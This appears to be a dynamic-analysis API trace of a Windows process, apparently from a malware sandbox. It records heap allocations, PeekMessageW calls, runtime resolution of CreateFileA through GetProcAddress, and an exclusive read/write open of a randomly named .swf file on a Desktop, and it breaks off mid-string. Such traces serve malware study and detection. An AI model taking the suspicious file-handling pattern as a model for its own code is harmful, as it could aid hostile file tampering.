[0030.954] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.954] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0030.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0030.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0030.954] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0030.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0030.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0030.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0030.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af478 [0030.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0030.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0030.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0030.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0030.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0030.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889c10 [0030.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0030.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0030.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0030.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0030.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0030.955] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0030.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0030.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0030.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0030.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0030.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0030.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0030.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0030.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0030.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0030.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0030.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0030.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0030.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0030.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0030.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0030.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0030.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0030.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0030.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0030.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0030.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0030.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0030.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0030.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0030.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0030.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0030.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0030.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0030.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0030.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0030.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0030.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0030.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0030.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0030.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0030.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0030.958] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0030.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0030.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0030.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0030.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0030.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0030.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0030.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0030.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0030.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0030.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0030.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0030.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0030.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0030.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0030.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0030.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0030.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0030.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0030.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0030.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0030.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0030.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0030.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0030.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0030.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0030.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0030.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0030.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0030.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0030.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0030.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0030.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0030.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0030.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0030.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0030.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0030.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0030.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0030.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0030.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0030.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0030.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0030.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0030.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0030.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0030.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0030.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0030.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0030.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.960] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0030.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0030.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889958 [0030.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889958, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0030.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0030.961] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0030.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0030.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0030.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0030.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0030.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889958 [0030.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x889958, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0030.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0030.961] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0030.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0030.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0030.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0030.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0030.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0030.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x88ffb0 [0030.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf", cchWideChar=80, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 80 [0030.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0030.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf", cchWideChar=80, lpMultiByteStr=0x7f3630, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf", lpUsedDefaultChar=0x0) returned 80 [0030.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0030.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.962] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\5o5ipnmm_es0x.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0030.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0030.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0030.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0030.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0030.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0030.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0030.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0030.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0030.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0030.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0030.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0030.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0030.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=80, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0030.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8600 [0030.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=80, lpWideCharStr=0x7d8600, cchWideChar=80 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS 